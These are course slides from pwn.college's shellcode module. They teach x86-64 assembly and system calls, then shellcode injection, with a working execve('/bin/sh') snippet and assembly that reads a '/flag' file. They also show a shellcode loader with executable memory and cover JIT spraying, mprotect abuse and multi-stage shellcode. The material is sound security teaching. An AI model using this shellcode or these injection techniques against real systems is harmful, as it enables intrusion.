pwn.college: Shellcode

Yan Shoshitaishvili

Arizona State University

The story so far...

In Module 1, we learned about how Linux programs work from the high level...

Now, we'll understand how their code runs and interacts with the environment!

Module 1

Module 2

All roads lead to the CPU

All software eventually runs on your CPU, as low-level machine instructions.

Programs written in compiled languages (C, C++, Rust, etc) run the machine code that they ship as.

Programs written in interpreted languages (Python, JavaScript, etc) are either JIT-compiled immediately before being run, or run by a compiled interpreter (in fancy cases, this interpreter is JIT-compiled itself).

To truly understand how all of this crazy stuff works, we need to understand what happens at the low level!

P.S. Your Computer Organization class should have taught you all of this.

Where do binary files go to?

http://www.electronics-tutorials.ws/logic/logic_1.html

All our powers combined...

http://www.electronics-tutorials.ws/category/combination

Computer Architecture (at a very high level)

CPU

Memory

Disk

Network + Others

"Some sort of bridge."

Computer Architecture (drilling down)

CPU

Memory

Disk

Network + Others

"Some sort of bridge."

CU

ALU

Registers

Computer Architecture (further down!)

CPU

Memory

Disk

Network + Others

"Some sort of bridge."

Cache

CU

ALU

Registers

Computer Architecture (as far as we'll go)

CPU

Memory

Disk

Network + Others

"Some sort of bridge."

L2

Cache

L1 Cache

CU

ALU

Registers

L1 Cache

CU

ALU

Registers

John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John Von Neumann (Mathematician)

John von Neumann, First Draft of a Report on the EDVAC, 1945.

Assembly

The only true programming language, as far as a CPU is concerned.

Concepts:

  • instructions
    • data manipulation instructions
    • comparison instructions
    • control flow instructions
    • system calls
  • registers
  • memory
    • program
    • stack
    • other mapped mem

Registers

Registers are very fast, temporary stores for data.

x86: eax, ecx, edx, ebx, esp, ebp, esi, edi

amd64: rax, rcx, rdx, rbx, rsp, rbp, rsi, rdi, r8, r9, r10, r11, r12, r13, r14, r15

arm: r0, r1, r2, r3, r4, r5, r6, r7, r8, r9, r10, r11, r12, r13, r14

The address of the next instruction is in a register:

eip (x86), rip (amd64), r15 (arm)

Various extensions add other registers (x87, MMX, SSE, etc).

Instructions

General form:

OPCODE OPERAND OPERAND, ...

OPCODE - what to do

OPERANDS - what to do it on/with

mov rax, rbx

add rax, 1

cmp rax, rbx

jb some_location

Useful reference: http://ref.x86asm.net

Instructions (data manipulation)

Instructions can move and manipulate data in registers and memory.

mov rax, rbx

mov rax, [rbx+4]

add rax, rbx

mul rsi, rdi

inc rax

inc [rax]

Instructions (control flow)

Control flow is determined by conditional and unconditional jumps.

Unconditional: call, jmp, ret

Conditional:

je

jne

jg

jl

jle

jge

ja

jb

jae

jbe

js

jns

jo

jno

jz

jnz

jump if equal

jump if not equal

jump if greater

jump if less

jump if less than or equal

jump if greater than or equal

jump if above (unsigned)

jump if below (unsigned)

jump if above or equal (unsigned)

jump if below or equal (unsigned)

jump if signed

jump if not signed

jump if overflow

jump if not overflow

jump if zero

jump if not zero

Instructions (conditionals)

Conditionals key off of the "flags" register: eflags (x86), rflags (amd64), aspr (arm)

Updated by (x86/amd64):

  • arithmetic operations
  • cmp - subtraction (cmp rax, rbx)
  • test - and (test rax, rax)

je

jne

jg

jl

jle

jge

ja

jb

jae

jbe

js

jns

jo

jno

jz

jnz

jump if equal

jump if not equal

jump if greater

jump if less

jump if less than or equal

jump if greater than or equal

jump if above (unsigned)

jump if below (unsigned)

jump if above or equal (unsigned)

jump if below or equal (unsigned)

jump if signed

jump if not signed

jump if overflow

jump if not overflow

jump if zero

jump if not zero

ZF=1

ZF=0

ZF=0 and SF=OF

SF!=OF

ZF=1 or SF!=OF

SF=OF

CF=0 and ZF=0

CF=1

CF=0

CF=1 or ZF=1

SF=1

SF=0

OF=1

OF=0

ZF=1

ZF=0

Instructions (system calls)

Almost all programs have to interact with the outside world!

This is primarily done via system calls (man syscalls). Each system call is well-documented in section 2 of the man pages (i.e., man 2 open).

System calls (on amd64) are triggered by:

  • set rax to the system call number
  • store arguments in rdi, rsi, etc (more on this later)
  • call the syscall instruction

We can trace process system calls using strace.

System Calls

System calls have very well-defined interfaces that very rarely change.

There are over 300 system calls in Linux. Here are some examples:

int open(const char *pathname, int flags) - returns a file new file descriptor of the open file (also shows up in /proc/self/fd!)

ssize_t read(int fd, void *buf, size_t count) - reads data from the file descriptor

ssize_t write(int fd, void *buf, size_t count) - writes data to the file descriptor

pid_t fork() - forks off an identical child process. Returns 0 if you're the child and the PID of the child if you're the parent.

int execve(const char *filename, char **argv, char **envp) - replaces your process with another program.

pid_t wait(int *wstatus) - wait on a child process to exit, return the PID, and write its status into *wstatus.

Typical signal combinations:

  • fork, execve, wait (think: a shell)
  • open, read, write (cat)

Memory (stack)

The stack fulfils four main uses:

  • Track the "callstack" of a program.
    • return values are "pushed" to the stack during a call and "popped" during a ret
  • Contain local variables of functions.
  • Provide scratch space (to alleviate register exhaustion).
  • Pass function arguments (always on x86, only for functions with "many" arguments on other architectures).

Relevant registers (amd64): rsp, rbp

Relevant instructions (amd64): push, pop

Memory (other mapped regions)

Other regions might be mapped in memory. We previously talked about regions loaded due to directives in the ELF headers, but functionality such as mmap and malloc can cause other regions to be mapped as well.

These don't come into play heavily yet, but will feature prominently in future assignments.

Memory (endianess)

Data on most modern systems is stored backwards.

Why?

Memory (endianess)

Data on most modern systems is stored backwards.

Why?

  • Performance (historical)
  • Ease of addressing for different sizes.
  • (apocryphal) 8086 compatibility

Calling conventions:

Callees and caller functions must agree on argument passing.

Linux x86: push arguments (in reverse order), then call (which pushes return address), return value in eax

Linux amd64: rdi, rsi, rdx, rcx, r8, r9, return value in rax

Linux arm: r0, r1, r2, r3, return value in r0

Registers are shared between functions, so calling conventions agree on what registers are protected.

Linux amd64: rbx, rbp, r12, r13, r14, r15 are "callee-saved"

Educational Resources

Rappel (https://github.com/yrp604/rappel) lets you explore the effects of instructions.

pwndevils how2hack:

  • http://pwndevils.com/hacking/howtwohack.html
  • web interface to step-by-step understanding of x86
  • NOTE: we are using x86_64 today, but many of the concepts are transferable

Opcode listing: http://ref.x86asm.net/coder64.html

x86_64 architecture manual: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf

Security Concept: Code Injection

Code injection was used in one of the earliest documented exploits: the Morris worm.

  • Overflowed stack buffer in the fingerd service.
  • Injected code to scan adjacent hosts and propagate the worm.

(translated to x86_64 and paraphrased):

mov rax, 59

mov rdi, "/bin/sh"

mov rsi, 0

mov rdx, 0

syscall

Why was this possible?

John Mauchly (Physicist), John Presper Eckert (Electrical Engineer), John Von Neumann (Mathematician)

John von Neumann, First Draft of a Report on the EDVAC, 1945.

Von Neumann Architecture vs Harvard Architecture

A Von Neumann architecture sees (and stores) code as data.

A Harvard architecture stores data and code separately.

Almost all general-purpose architectures (x86, ARM, MIPS, PPC, SPARC, etc) are Von Neumann.

Harvard architectures pop up in embedded use-cases (AVR, PIC).

Discussion: problems with viewing code and data interchangeably?

Why "shell"code?

Usually, the goal of an exploit is to achieve arbitrary command execution.

The easiest way to do this is to launch a shell (i.e., "/bin/sh"). For our purposes, we can also sendfile(1, open("/flag", NULL), 0, 1000).

Thus: "shellcode"

Building Shellcode

First, write your shellcode as assembly:

.globl _start

_start:

.intel_syntax noprefix

/* push '/flag\x00' */

mov rbx, 0x00000067616c662f

push rbx

/* call open(rsp, NULL) */

mov rax, 2

mov rdi, rsp

mov rsi, 0

syscall

/* call sendfile(1, fd, 0, 1000) */

mov rdi, 1

mov rsi, rax

mov rdx, 0

mov r10, 1000

mov rax, 40

syscall

mov rax, 60

syscall

Then, assemble and extract it:

gcc -nostdlib shellcode.s -o shellcode-runner
objcopy --dump-section .text=shellcode-raw shellcode-runner

Now, your shellcode is in the "shellcode-raw" file! This method works great with cross-compilers to create shellcode for other architectures.

Testing Shellcode (without the trick on the last slide)

To test your shellcode, build a shellcode loader:

page = mmap(0x1337000, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, 0, 0);
read(0, page, 0x1000);
((void(*)())page)();

Then cat shellcode | ./tester

Use a cross-compiler and qemu to test shellcode for other architectures.

Alternatively, you can update the binary from the previous slide:

objcopy --update-section .text=shellcode-new shellcode-runner

Debugging Shellcode

GDB is your friend.

strace is your friend.

Hardcoded breakpoints are your friends!

  • breakpoints are implemented with the int3 instruction
  • you can place this anywhere yourself!
  • demo time!

Challenges in Shellcoding

Memory Access Trickiness

Think about the implications of code being data!

Be careful about sizes of memory access:

single byte:

mov [rax], bl

2-byte word:

mov [rax], bx

4-byte dword:

mov [rax], ebx

8-byte qword:

mov [rax], rbx

Mitigation: the "No-eXecute" bit

Finally, computer architectures wised up!

Modern architectures support memory permissions:

  • PROT_READ allows the process to read memory
  • PROT_WRITE allows the process to write memory
  • PROT_EXEC allows the process to execute memory

Intuition: normally, all code is located in .text segments of the loaded ELF files. There is no need to execute code located on the stack or in the heap.

By default in modern systems, the stack and the heap are not executable.

YOUR SHELLCODE NEEDS TO EXECUTE.

Game over?

The "No-eXecute" bit

The rise of NX has made shellcoding rarer.

It is now... an ancient art!

Remaining Injection Points - de-protecting memory

Vector 1: abuse the program to mprotect() memory.

Memory can be made executable using the mprotect() system call:

  • Trick the program into mprotect(PROT_EXEC)ing our shellcode.
  • Jump to the shellcode.

How do we do #1?

  • Most common way is code reuse through Return Oriented Programming, where we stitch pieces of a program together to achieve our goal. We will cover this in a future module.
  • Other cases are situational, depending on what the program is designed to do.

Remaining Injection Points - JIT

Vector 2: target a JIT.

  • Just in Time compilers need to generate (and frequently re-generate) code that is executed.
  • Pages must be writable for code generation.
  • Pages must be executable for execution.
  • Pages must be writable for code re-generation.

The safe thing to do would be to:

  • mmap(PROT_READ|PROT_WRITE)
  • write the code
  • mprotect(PROT_READ|PROT_EXEC)
  • execute
  • mprotect(PROT_READ|PROT_WRITE)
  • update code
  • etc...

Obviously, not all JIT engines are safe...

Remaining Injection Points - JIT

Most JIT engines don't bother to mprotect(), but always have the pages executable.

Discussion: why is this?

Injection:

  • Corrupt a write pointer to point to the JIT page.
  • Write shellcode to the JIT page.
  • Corrupt a code pointer (such as a return address) to redirect execution into your shellcode.

Remaining Injection Points - JIT

What if the JIT safely mprotect()s its pages?

Shellcode injection technique: JIT spraying.

  • Make constants in the code that will be JITed:
    var evil = "%90%90%90%90%90";
  • The JIT engine will mprotect(PROT_WRITE), compile the code into memory, then mprotect(PROT_EXEC). Your constant is now present in executable memory.
  • Corrupt a code pointer to redirect execution into the constant.

If you can make many many constants, you can even mitigate the effects of Address Space Layout Randomization.

Remaining Injection Points - JIT

JIT is used everywhere: browsers, Java, and most interpreted language runtimes (luajit, pypi, etc), so this vector is very relevant.

Complications 1

Depending on how the program works, you might have to send shellcode matching some specific format:

Common conditions:

  • no NULL bytes (i.e., shellcode injected via strcpy())
  • no newlines or spaces (scanf())
  • only printable characters
  • many other situations exist (and will be encountered in HW6).

Complications 2

Your shellcode might be mangled beyond recognition.

Common situations:

  • your shellcode might be sorted!
  • your shellcode might be compressed or uncompressed.
  • your shellcode might be encrypted or decrypted.
  • any other mangling could be applied...

Complication 3

Normally, your shellcode will just give you a shell (or the flag).

What if there is no way to output data (i.e., close(1); close(2);)?

What other ways can you use to communicate the flag?

Adapting to complications

  • Use jumps to jump over introduced garbage code.
    • very useful for sorted or JITed shellcode.
  • Understand what instructions you can inject.
    • useful library: capstone (apt install python-capstone)
  • Use an unpacking shellcode.
    • if the page where your shellcode is writable, it can modify itself!
    • this lets you use the few instructions you can to write other instructions and execute them.
  • Use a multi-stage shellcode.
    • stage 1: read(0, rip, 1000).
    • this overwrites your shellcode with unfiltered data!
    • stage 2: whatever you want!
    • a good stage-1 shellcode is very short, letting you get around complex shellcode requirements
    • downside: you don't always have access to inject more shellcode...
Module 02 - Shellcode Injection - Google Slides